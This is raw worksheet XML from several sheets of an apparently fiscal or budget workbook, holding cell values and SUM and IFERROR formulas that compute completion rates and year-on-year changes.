  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="33.4259259259259" style="968" customWidth="1"/>
    <col min="2" max="3" width="12.8425925925926" style="968" customWidth="1"/>
    <col min="4" max="6" width="11.5740740740741" style="968" customWidth="1"/>
    <col min="7" max="16378" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" s="968" customFormat="1" ht="17.4" spans="1:16384">
      <c r="A1" s="858" t="s">
        <v>606</v>
      </c>
      <c r="XEY1"/>
      <c r="XEZ1"/>
      <c r="XFA1"/>
      <c r="XFB1"/>
      <c r="XFC1"/>
      <c r="XFD1"/>
    </row>
    <row r="2" s="968" customFormat="1" ht="26.4" spans="1:16384">
      <c r="A2" s="998" t="s">
        <v>607</v>
      </c>
      <c r="B2" s="998"/>
      <c r="C2" s="998"/>
      <c r="D2" s="998"/>
      <c r="E2" s="998"/>
      <c r="F2" s="998"/>
      <c r="XEY2"/>
      <c r="XEZ2"/>
      <c r="XFA2"/>
      <c r="XFB2"/>
      <c r="XFC2"/>
      <c r="XFD2"/>
    </row>
    <row r="3" s="968" customFormat="1" spans="6:16384">
      <c r="F3" s="1112" t="s">
        <v>547</v>
      </c>
      <c r="XEY3"/>
      <c r="XEZ3"/>
      <c r="XFA3"/>
      <c r="XFB3"/>
      <c r="XFC3"/>
      <c r="XFD3"/>
    </row>
    <row r="4" s="968" customFormat="1" ht="36" customHeight="1" spans="1:16384">
      <c r="A4" s="972" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="972" t="s">
        <v>517</v>
      </c>
      <c r="C4" s="972" t="s">
        <v>518</v>
      </c>
      <c r="D4" s="972" t="s">
        <v>519</v>
      </c>
      <c r="E4" s="972"/>
      <c r="F4" s="972"/>
      <c r="XEY4"/>
      <c r="XEZ4"/>
      <c r="XFA4"/>
      <c r="XFB4"/>
      <c r="XFC4"/>
      <c r="XFD4"/>
    </row>
    <row r="5" s="968" customFormat="1" ht="36" customHeight="1" spans="1:16384">
      <c r="A5" s="1061"/>
      <c r="B5" s="972"/>
      <c r="C5" s="972"/>
      <c r="D5" s="972" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="972" t="s">
        <v>379</v>
      </c>
      <c r="F5" s="972" t="s">
        <v>380</v>
      </c>
      <c r="XEY5"/>
      <c r="XEZ5"/>
      <c r="XFA5"/>
      <c r="XFB5"/>
      <c r="XFC5"/>
      <c r="XFD5"/>
    </row>
    <row r="6" s="968" customFormat="1" ht="33" customHeight="1" spans="1:16384">
      <c r="A6" s="974" t="s">
        <v>608</v>
      </c>
      <c r="B6" s="1113"/>
      <c r="C6" s="1074"/>
      <c r="D6" s="975"/>
      <c r="E6" s="777"/>
      <c r="F6" s="777"/>
      <c r="XEY6"/>
      <c r="XEZ6"/>
      <c r="XFA6"/>
      <c r="XFB6"/>
      <c r="XFC6"/>
      <c r="XFD6"/>
    </row>
    <row r="7" s="968" customFormat="1" ht="33" customHeight="1" spans="1:16384">
      <c r="A7" s="974" t="s">
        <v>609</v>
      </c>
      <c r="B7" s="979">
        <f>SUM(B8:B9)</f>
        <v>86</v>
      </c>
      <c r="C7" s="979">
        <f>SUM(C8:C9)</f>
        <v>77</v>
      </c>
      <c r="D7" s="977">
        <f>SUM(D8:D9)</f>
        <v>78</v>
      </c>
      <c r="E7" s="777">
        <f>IFERROR(D7/C7*100,"-")</f>
        <v>101.298701298701</v>
      </c>
      <c r="F7" s="777">
        <f t="shared" ref="F7:F9" si="0">IFERROR((D7-B7)/B7*100,"-")</f>
        <v>-9.30232558139535</v>
      </c>
      <c r="XEY7"/>
      <c r="XEZ7"/>
      <c r="XFA7"/>
      <c r="XFB7"/>
      <c r="XFC7"/>
      <c r="XFD7"/>
    </row>
    <row r="8" s="968" customFormat="1" ht="33" customHeight="1" spans="1:16384">
      <c r="A8" s="974" t="s">
        <v>610</v>
      </c>
      <c r="B8" s="979">
        <v>80</v>
      </c>
      <c r="C8" s="977">
        <v>71</v>
      </c>
      <c r="D8" s="977">
        <v>72</v>
      </c>
      <c r="E8" s="777">
        <f>IFERROR(D8/C8*100,"-")</f>
        <v>101.408450704225</v>
      </c>
      <c r="F8" s="777">
        <f t="shared" si="0"/>
        <v>-10</v>
      </c>
      <c r="XEY8"/>
      <c r="XEZ8"/>
      <c r="XFA8"/>
      <c r="XFB8"/>
      <c r="XFC8"/>
      <c r="XFD8"/>
    </row>
    <row r="9" s="968" customFormat="1" ht="33" customHeight="1" spans="1:16384">
      <c r="A9" s="974" t="s">
        <v>611</v>
      </c>
      <c r="B9" s="979">
        <v>6</v>
      </c>
      <c r="C9" s="979">
        <v>6</v>
      </c>
      <c r="D9" s="977">
        <v>6</v>
      </c>
      <c r="E9" s="777">
        <f>IFERROR(D9/C9*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F9" s="777">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="XEY9"/>
      <c r="XEZ9"/>
      <c r="XFA9"/>
      <c r="XFB9"/>
      <c r="XFC9"/>
      <c r="XFD9"/>
    </row>
    <row r="10" s="968" customFormat="1" ht="21.95" customHeight="1" spans="1:16384">
      <c r="A10" s="979"/>
      <c r="B10" s="979"/>
      <c r="C10" s="979"/>
      <c r="D10" s="977"/>
      <c r="E10" s="777"/>
      <c r="F10" s="777"/>
      <c r="XEY10"/>
      <c r="XEZ10"/>
      <c r="XFA10"/>
      <c r="XFB10"/>
      <c r="XFC10"/>
      <c r="XFD10"/>
    </row>
    <row r="11" s="968" customFormat="1" ht="21.95" customHeight="1" spans="1:16384">
      <c r="A11" s="979"/>
      <c r="B11" s="979"/>
      <c r="C11" s="979"/>
      <c r="D11" s="977"/>
      <c r="E11" s="777"/>
      <c r="F11" s="777"/>
      <c r="XEY11"/>
      <c r="XEZ11"/>
      <c r="XFA11"/>
      <c r="XFB11"/>
      <c r="XFC11"/>
      <c r="XFD11"/>
    </row>
    <row r="12" s="968" customFormat="1" ht="21.95" customHeight="1" spans="1:16384">
      <c r="A12" s="979"/>
      <c r="B12" s="979"/>
      <c r="C12" s="979"/>
      <c r="D12" s="977"/>
      <c r="E12" s="777"/>
      <c r="F12" s="777"/>
      <c r="XEY12"/>
      <c r="XEZ12"/>
      <c r="XFA12"/>
      <c r="XFB12"/>
      <c r="XFC12"/>
      <c r="XFD12"/>
    </row>
    <row r="13" s="968" customFormat="1" ht="21.95" customHeight="1" spans="1:16384">
      <c r="A13" s="979"/>
      <c r="B13" s="979"/>
      <c r="C13" s="979"/>
      <c r="D13" s="977"/>
      <c r="E13" s="777"/>
      <c r="F13" s="777"/>
      <c r="XEY13"/>
      <c r="XEZ13"/>
      <c r="XFA13"/>
      <c r="XFB13"/>
      <c r="XFC13"/>
      <c r="XFD13"/>
    </row>
    <row r="14" s="968" customFormat="1" ht="21.95" customHeight="1" spans="1:16384">
      <c r="A14" s="979"/>
      <c r="B14" s="979"/>
      <c r="C14" s="979"/>
      <c r="D14" s="977"/>
      <c r="E14" s="777"/>
      <c r="F14" s="777"/>
      <c r="XEY14"/>
      <c r="XEZ14"/>
      <c r="XFA14"/>
      <c r="XFB14"/>
      <c r="XFC14"/>
      <c r="XFD14"/>
    </row>
    <row r="15" s="968" customFormat="1" ht="27.95" customHeight="1" spans="1:16384">
      <c r="A15" s="980" t="s">
        <v>444</v>
      </c>
      <c r="B15" s="980">
        <f>SUM(B6,B7)</f>
        <v>86</v>
      </c>
      <c r="C15" s="980">
        <f>SUM(C6,C7)</f>
        <v>77</v>
      </c>
      <c r="D15" s="981">
        <f>SUM(D6,D7)</f>
        <v>78</v>
      </c>
      <c r="E15" s="1086">
        <f t="shared" ref="E15:E17" si="1">IFERROR(D15/C15*100,"-")</f>
        <v>101.298701298701</v>
      </c>
      <c r="F15" s="1086">
        <f t="shared" ref="F15:F17" si="2">IFERROR((D15-B15)/B15*100,"-")</f>
        <v>-9.30232558139535</v>
      </c>
      <c r="XEY15"/>
      <c r="XEZ15"/>
      <c r="XFA15"/>
      <c r="XFB15"/>
      <c r="XFC15"/>
      <c r="XFD15"/>
    </row>
    <row r="16" s="968" customFormat="1" ht="27.95" customHeight="1" spans="1:16384">
      <c r="A16" s="974" t="s">
        <v>448</v>
      </c>
      <c r="B16" s="979">
        <f>SUM(B17:B18)</f>
        <v>7719</v>
      </c>
      <c r="C16" s="979">
        <f>SUM(C17:C18)</f>
        <v>11732</v>
      </c>
      <c r="D16" s="977">
        <f>SUM(D17:D18)</f>
        <v>11731</v>
      </c>
      <c r="E16" s="777">
        <f t="shared" si="1"/>
        <v>99.9914763041255</v>
      </c>
      <c r="F16" s="777">
        <f t="shared" si="2"/>
        <v>51.975644513538</v>
      </c>
      <c r="XEY16"/>
      <c r="XEZ16"/>
      <c r="XFA16"/>
      <c r="XFB16"/>
      <c r="XFC16"/>
      <c r="XFD16"/>
    </row>
    <row r="17" s="968" customFormat="1" ht="27.95" customHeight="1" spans="1:16384">
      <c r="A17" s="974" t="s">
        <v>591</v>
      </c>
      <c r="B17" s="979">
        <v>7719</v>
      </c>
      <c r="C17" s="979">
        <v>11732</v>
      </c>
      <c r="D17" s="977">
        <v>11731</v>
      </c>
      <c r="E17" s="777">
        <f t="shared" si="1"/>
        <v>99.9914763041255</v>
      </c>
      <c r="F17" s="777">
        <f t="shared" si="2"/>
        <v>51.975644513538</v>
      </c>
      <c r="XEY17"/>
      <c r="XEZ17"/>
      <c r="XFA17"/>
      <c r="XFB17"/>
      <c r="XFC17"/>
      <c r="XFD17"/>
    </row>
    <row r="18" s="968" customFormat="1" ht="27.95" customHeight="1" spans="1:16384">
      <c r="A18" s="974" t="s">
        <v>612</v>
      </c>
      <c r="B18" s="979"/>
      <c r="C18" s="979"/>
      <c r="D18" s="977"/>
      <c r="E18" s="777"/>
      <c r="F18" s="777"/>
      <c r="XEY18"/>
      <c r="XEZ18"/>
      <c r="XFA18"/>
      <c r="XFB18"/>
      <c r="XFC18"/>
      <c r="XFD18"/>
    </row>
    <row r="19" s="968" customFormat="1" ht="27.95" customHeight="1" spans="1:16384">
      <c r="A19" s="780" t="s">
        <v>454</v>
      </c>
      <c r="B19" s="780">
        <f>SUM(B15,B16)</f>
        <v>7805</v>
      </c>
      <c r="C19" s="780">
        <f>SUM(C15,C16)</f>
        <v>11809</v>
      </c>
      <c r="D19" s="984">
        <f>SUM(D15,D16)</f>
        <v>11809</v>
      </c>
      <c r="E19" s="782">
        <f>IFERROR(D19/C19*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F19" s="782">
        <f>IFERROR((D19-B19)/B19*100,"-")</f>
        <v>51.3004484304933</v>
      </c>
      <c r="XEY19"/>
      <c r="XEZ19"/>
      <c r="XFA19"/>
      <c r="XFB19"/>
      <c r="XFC19"/>
      <c r="XFD19"/>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <pageMargins left="0.590277777777778" right="0.708661417322835" top="0.748031496062992" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" scale="95"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6"/>
  </sheetPr>
  <dimension ref="A1:I14"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D7" sqref="D7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="24.4259259259259" style="899" customWidth="1"/>
    <col min="2" max="2" width="12.2777777777778" style="899" customWidth="1"/>
    <col min="3" max="3" width="12.2777777777778" style="940" customWidth="1"/>
    <col min="4" max="4" width="12.2777777777778" style="899" customWidth="1"/>
    <col min="5" max="6" width="12.2777777777778" style="941" customWidth="1"/>
    <col min="7" max="16384" width="10.2777777777778" style="899"/>
  </cols>
  <sheetData>
    <row r="1" ht="23.25" customHeight="1" spans="1:1">
      <c r="A1" s="864" t="s">
        <v>613</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:6">
      <c r="A2" s="901" t="s">
        <v>614</v>
      </c>
      <c r="B2" s="901"/>
      <c r="C2" s="901"/>
      <c r="D2" s="901"/>
      <c r="E2" s="901"/>
      <c r="F2" s="901"/>
    </row>
    <row r="3" spans="1:6">
      <c r="A3" s="943"/>
      <c r="B3" s="943"/>
      <c r="C3" s="943"/>
      <c r="D3" s="944"/>
      <c r="E3" s="945"/>
      <c r="F3" s="946" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" spans="1:6">
      <c r="A4" s="972" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="1097" t="s">
        <v>615</v>
      </c>
      <c r="C4" s="1097" t="s">
        <v>616</v>
      </c>
      <c r="D4" s="1098" t="s">
        <v>617</v>
      </c>
      <c r="E4" s="1098"/>
      <c r="F4" s="1098"/>
    </row>
    <row r="5" ht="23.25" customHeight="1" spans="1:6">
      <c r="A5" s="1061"/>
      <c r="B5" s="1097"/>
      <c r="C5" s="1097"/>
      <c r="D5" s="1098" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="1110" t="s">
        <v>618</v>
      </c>
      <c r="F5" s="1099" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="6" ht="30.95" customHeight="1" spans="1:6">
      <c r="A6" s="791" t="s">
        <v>620</v>
      </c>
      <c r="B6" s="1111">
        <f>B9+B12</f>
        <v>87700</v>
      </c>
      <c r="C6" s="935">
        <f>C9+C12</f>
        <v>108602</v>
      </c>
      <c r="D6" s="935">
        <f>D9+D12</f>
        <v>92712</v>
      </c>
      <c r="E6" s="949">
        <f t="shared" ref="E6:E14" si="0">D6/C6*100</f>
        <v>85.3685935802287</v>
      </c>
      <c r="F6" s="949">
        <f t="shared" ref="F6:F14" si="1">(D6-B6)/B6*100</f>
        <v>5.71493728620296</v>
      </c>
    </row>
    <row r="7" ht="30.95" customHeight="1" spans="1:6">
      <c r="A7" s="790" t="s">
        <v>621</v>
      </c>
      <c r="B7" s="1101">
        <v>35718</v>
      </c>
      <c r="C7" s="913">
        <v>31734</v>
      </c>
      <c r="D7" s="913">
        <v>32790</v>
      </c>
      <c r="E7" s="950">
        <f t="shared" si="0"/>
        <v>103.327661183589</v>
      </c>
      <c r="F7" s="950">
        <f t="shared" si="1"/>
        <v>-8.19754745506467</v>
      </c>
    </row>
    <row r="8" ht="30.95" customHeight="1" spans="1:6">
      <c r="A8" s="790" t="s">
        <v>622</v>
      </c>
      <c r="B8" s="1101">
        <v>49140</v>
      </c>
      <c r="C8" s="913">
        <v>72688</v>
      </c>
      <c r="D8" s="913">
        <v>56711</v>
      </c>
      <c r="E8" s="950">
        <f t="shared" si="0"/>
        <v>78.0197556680608</v>
      </c>
      <c r="F8" s="950">
        <f t="shared" si="1"/>
        <v>15.4070004070004</v>
      </c>
    </row>
    <row r="9" ht="30.95" customHeight="1" spans="1:6">
      <c r="A9" s="790" t="s">
        <v>623</v>
      </c>
      <c r="B9" s="1101">
        <v>53959</v>
      </c>
      <c r="C9" s="913">
        <v>59372</v>
      </c>
      <c r="D9" s="913">
        <v>59631</v>
      </c>
      <c r="E9" s="950">
        <f t="shared" si="0"/>
        <v>100.43623256754</v>
      </c>
      <c r="F9" s="950">
        <f t="shared" si="1"/>
        <v>10.5116847977168</v>
      </c>
    </row>
    <row r="10" ht="30.95" customHeight="1" spans="1:6">
      <c r="A10" s="790" t="s">
        <v>621</v>
      </c>
      <c r="B10" s="1101">
        <v>28852</v>
      </c>
      <c r="C10" s="913">
        <v>30234</v>
      </c>
      <c r="D10" s="913">
        <v>30220</v>
      </c>
      <c r="E10" s="950">
        <f t="shared" si="0"/>
        <v>99.9536945161077</v>
      </c>
      <c r="F10" s="950">
        <f t="shared" si="1"/>
        <v>4.74143906834882</v>
      </c>
    </row>
    <row r="11" ht="30.95" customHeight="1" spans="1:9">
      <c r="A11" s="790" t="s">
        <v>622</v>
      </c>
      <c r="B11" s="1101">
        <v>24559</v>
      </c>
      <c r="C11" s="913">
        <v>28500</v>
      </c>
      <c r="D11" s="913">
        <v>28500</v>
      </c>
      <c r="E11" s="950">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F11" s="950">
        <f t="shared" si="1"/>
        <v>16.0470703204528</v>
      </c>
      <c r="I11" s="952"/>
    </row>
    <row r="12" ht="30.95" customHeight="1" spans="1:6">
      <c r="A12" s="790" t="s">
        <v>624</v>
      </c>
      <c r="B12" s="1101">
        <v>33741</v>
      </c>
      <c r="C12" s="913">
        <v>49230</v>
      </c>
      <c r="D12" s="913">
        <v>33081</v>
      </c>
      <c r="E12" s="950">
        <f t="shared" si="0"/>
        <v>67.1968312004875</v>
      </c>
      <c r="F12" s="950">
        <f t="shared" si="1"/>
        <v>-1.95607717613586</v>
      </c>
    </row>
    <row r="13" ht="30.95" customHeight="1" spans="1:6">
      <c r="A13" s="790" t="s">
        <v>621</v>
      </c>
      <c r="B13" s="1101">
        <v>6866</v>
      </c>
      <c r="C13" s="913">
        <v>1500</v>
      </c>
      <c r="D13" s="913">
        <v>2571</v>
      </c>
      <c r="E13" s="950">
        <f t="shared" si="0"/>
        <v>171.4</v>
      </c>
      <c r="F13" s="950">
        <f t="shared" si="1"/>
        <v>-62.5546169531022</v>
      </c>
    </row>
    <row r="14" ht="30.95" customHeight="1" spans="1:6">
      <c r="A14" s="792" t="s">
        <v>622</v>
      </c>
      <c r="B14" s="1109">
        <v>24581</v>
      </c>
      <c r="C14" s="916">
        <v>44188</v>
      </c>
      <c r="D14" s="916">
        <v>28211</v>
      </c>
      <c r="E14" s="951">
        <f t="shared" si="0"/>
        <v>63.8431248302707</v>
      </c>
      <c r="F14" s="951">
        <f t="shared" si="1"/>
        <v>14.7675033562508</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
  </sheetPr>
  <dimension ref="A1:F11"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F10" sqref="F10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="30" style="917" customWidth="1"/>
    <col min="2" max="6" width="11.4259259259259" style="899" customWidth="1"/>
    <col min="7" max="16384" width="10.2777777777778" style="899"/>
  </cols>
  <sheetData>
    <row r="1" ht="15.75" customHeight="1" spans="1:1">
      <c r="A1" s="1096" t="s">
        <v>625</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:6">
      <c r="A2" s="901" t="s">
        <v>626</v>
      </c>
      <c r="B2" s="901"/>
      <c r="C2" s="901"/>
      <c r="D2" s="901"/>
      <c r="E2" s="901"/>
      <c r="F2" s="901"/>
    </row>
    <row r="3" ht="13.2" spans="1:6">
      <c r="A3" s="903" t="s">
        <v>373</v>
      </c>
      <c r="B3" s="903"/>
      <c r="C3" s="903"/>
      <c r="D3" s="903"/>
      <c r="E3" s="903"/>
      <c r="F3" s="903"/>
    </row>
    <row r="4" ht="29.1" customHeight="1" spans="1:6">
      <c r="A4" s="972" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="1097" t="s">
        <v>615</v>
      </c>
      <c r="C4" s="1097" t="s">
        <v>616</v>
      </c>
      <c r="D4" s="1098" t="s">
        <v>617</v>
      </c>
      <c r="E4" s="1098"/>
      <c r="F4" s="1098"/>
    </row>
    <row r="5" ht="29.1" customHeight="1" spans="1:6">
      <c r="A5" s="1061"/>
      <c r="B5" s="1097"/>
      <c r="C5" s="1097"/>
      <c r="D5" s="1098" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="1099" t="s">
        <v>618</v>
      </c>
      <c r="F5" s="1099" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="6" ht="35.1" customHeight="1" spans="1:6">
      <c r="A6" s="362" t="s">
        <v>627</v>
      </c>
      <c r="B6" s="1100">
        <v>54382</v>
      </c>
      <c r="C6" s="925">
        <v>58887</v>
      </c>
      <c r="D6" s="926">
        <v>59396</v>
      </c>
      <c r="E6" s="927">
        <f t="shared" ref="E6:E11" si="0">D6/C6*100</f>
        <v>100.864367347632</v>
      </c>
      <c r="F6" s="927">
        <f t="shared" ref="F6:F11" si="1">(D6-B6)/B6*100</f>
        <v>9.2199624875878</v>
      </c>
    </row>
    <row r="7" ht="35.1" customHeight="1" spans="1:6">
      <c r="A7" s="928" t="s">
        <v>628</v>
      </c>
      <c r="B7" s="1101">
        <v>54274</v>
      </c>
      <c r="C7" s="913">
        <v>57512</v>
      </c>
      <c r="D7" s="930">
        <v>57493</v>
      </c>
      <c r="E7" s="931">
        <f t="shared" si="0"/>
        <v>99.9669634163305</v>
      </c>
      <c r="F7" s="931">
        <f t="shared" si="1"/>
        <v>5.93101669307587</v>
      </c>
    </row>
    <row r="8" ht="35.1" customHeight="1" spans="1:6">
      <c r="A8" s="365" t="s">
        <v>629</v>
      </c>
      <c r="B8" s="1101">
        <v>35685</v>
      </c>
      <c r="C8" s="913">
        <v>40936</v>
      </c>
      <c r="D8" s="930">
        <v>40897</v>
      </c>
      <c r="E8" s="931">
        <f t="shared" si="0"/>
        <v>99.9047293335939</v>
      </c>
      <c r="F8" s="931">
        <f t="shared" si="1"/>
        <v>14.6055765727897</v>
      </c>
    </row>
    <row r="9" ht="35.1" customHeight="1" spans="1:6">
      <c r="A9" s="1102" t="s">
        <v>630</v>
      </c>
      <c r="B9" s="1103">
        <v>35594</v>
      </c>
      <c r="C9" s="913">
        <v>40896</v>
      </c>
      <c r="D9" s="1104">
        <v>40857</v>
      </c>
      <c r="E9" s="1105">
        <f t="shared" si="0"/>
        <v>99.9046361502347</v>
      </c>
      <c r="F9" s="931">
        <f t="shared" si="1"/>
        <v>14.7861999213351</v>
      </c>
    </row>
    <row r="10" ht="35.1" customHeight="1" spans="1:6">
      <c r="A10" s="1106" t="s">
        <v>631</v>
      </c>
      <c r="B10" s="1107">
        <v>90067</v>
      </c>
      <c r="C10" s="935">
        <v>99823</v>
      </c>
      <c r="D10" s="935">
        <v>100293</v>
      </c>
      <c r="E10" s="936">
        <f t="shared" si="0"/>
        <v>100.470833375074</v>
      </c>
      <c r="F10" s="936">
        <f t="shared" si="1"/>
        <v>11.3537699712436</v>
      </c>
    </row>
    <row r="11" ht="35.1" customHeight="1" spans="1:6">
      <c r="A11" s="1108" t="s">
        <v>632</v>
      </c>
      <c r="B11" s="1109">
        <v>89869</v>
      </c>
      <c r="C11" s="916">
        <v>98408</v>
      </c>
      <c r="D11" s="916">
        <v>98350</v>
      </c>
      <c r="E11" s="939">
        <f t="shared" si="0"/>
        <v>99.9410617023006</v>
      </c>
      <c r="F11" s="939">
        <f t="shared" si="1"/>
        <v>9.43706951229011</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="A3:F3"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
  </sheetPr>
  <dimension ref="A1:D14"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B7" sqref="B7:C8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="39.5740740740741" style="899" customWidth="1"/>
    <col min="2" max="3" width="22.1481481481481" style="899" customWidth="1"/>
    <col min="4" max="16384" width="10.2777777777778" style="899"/>
  </cols>
  <sheetData>
    <row r="1" ht="20.25" customHeight="1" spans="1:1">
      <c r="A1" s="1088" t="s">
        <v>633</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:3">
      <c r="A2" s="901" t="s">
        <v>634</v>
      </c>
      <c r="B2" s="901"/>
      <c r="C2" s="901"/>
    </row>
    <row r="3" ht="19" customHeight="1" spans="1:3">
      <c r="A3" s="902"/>
      <c r="B3" s="902"/>
      <c r="C3" s="903" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="13.2" spans="1:4">
      <c r="A4" s="1089" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="1090" t="s">
        <v>615</v>
      </c>
      <c r="C4" s="1091" t="s">
        <v>519</v>
      </c>
      <c r="D4" s="906"/>
    </row>
    <row r="5" ht="13.2" spans="1:3">
      <c r="A5" s="1092"/>
      <c r="B5" s="1092"/>
      <c r="C5" s="1093"/>
    </row>
    <row r="6" ht="44.25" customHeight="1" spans="1:3">
      <c r="A6" s="909" t="s">
        <v>635</v>
      </c>
      <c r="B6" s="910">
        <f>SUM(B7:B8)</f>
        <v>84103</v>
      </c>
      <c r="C6" s="1094">
        <f>C7+C8</f>
        <v>76524</v>
      </c>
    </row>
    <row r="7" ht="44.25" customHeight="1" spans="1:3">
      <c r="A7" s="911" t="s">
        <v>636</v>
      </c>
      <c r="B7" s="912">
        <v>228</v>
      </c>
      <c r="C7" s="913">
        <v>465</v>
      </c>
    </row>
    <row r="8" ht="44.25" customHeight="1" spans="1:3">
      <c r="A8" s="914" t="s">
        <v>637</v>
      </c>
      <c r="B8" s="915">
        <v>83875</v>
      </c>
      <c r="C8" s="916">
        <v>76059</v>
      </c>
    </row>
    <row r="14" ht="21" spans="2:2">
      <c r="B14" s="1095"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.314583333333333" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:A7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A4" sqref="A4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.14814814814815" defaultRowHeight="13.2" outlineLevelRow="6"/>
  <cols>
    <col min="1" max="1" width="89.7222222222222" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="57" customHeight="1"/>
    <row r="2" ht="57" customHeight="1"/>
    <row r="3" ht="148.8" spans="1:1">
      <c r="A3" s="78" t="s">
        <v>638</v>
      </c>
    </row>
    <row r="4" ht="57" customHeight="1"/>
    <row r="5" ht="57" customHeight="1"/>
    <row r="6" ht="57" customHeight="1"/>
    <row r="7" ht="57" customHeight="1"/>
  </sheetData>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showGridLines="0" showRowColHeaders="0" showZeros="0" showOutlineSymbols="0" topLeftCell="B1" workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.84259259259259" defaultRowHeight="13.2"/>
  <sheetData/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
  </sheetPr>
  <dimension ref="A1:XFD43"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="7" topLeftCell="B20" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="C23" sqref="C23:C29"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="38.1481481481481" style="968" customWidth="1"/>
    <col min="2" max="4" width="15.5555555555556" style="968" customWidth="1"/>
    <col min="5" max="5" width="11.7222222222222" style="968"/>
    <col min="6" max="16378" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" spans="1:1">
      <c r="A1" s="858" t="s">
        <v>639</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:4">
      <c r="A2" s="998" t="s">
        <v>640</v>
      </c>
      <c r="B2" s="998"/>
      <c r="C2" s="998"/>
      <c r="D2" s="998"/>
    </row>
    <row r="3" spans="1:4">
      <c r="A3" s="1081"/>
      <c r="B3" s="1081"/>
      <c r="C3" s="1081"/>
      <c r="D3" s="1082" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="694" customFormat="1" ht="21" customHeight="1" spans="1:4">
      <c r="A4" s="972" t="s">
        <v>641</v>
      </c>
      <c r="B4" s="972" t="s">
        <v>517</v>
      </c>
      <c r="C4" s="972" t="s">
        <v>519</v>
      </c>
      <c r="D4" s="972"/>
    </row>
    <row r="5" s="694" customFormat="1" ht="24" customHeight="1" spans="1:4">
      <c r="A5" s="1061"/>
      <c r="B5" s="972"/>
      <c r="C5" s="972" t="s">
        <v>378</v>
      </c>
      <c r="D5" s="972" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="6" ht="17" customHeight="1" spans="1:4">
      <c r="A6" s="774" t="s">
        <v>381</v>
      </c>
      <c r="B6" s="775">
        <f>SUM(B7:B21)</f>
        <v>87256</v>
      </c>
      <c r="C6" s="779">
        <f>SUM(C7:C21)</f>
        <v>91601</v>
      </c>
      <c r="D6" s="777">
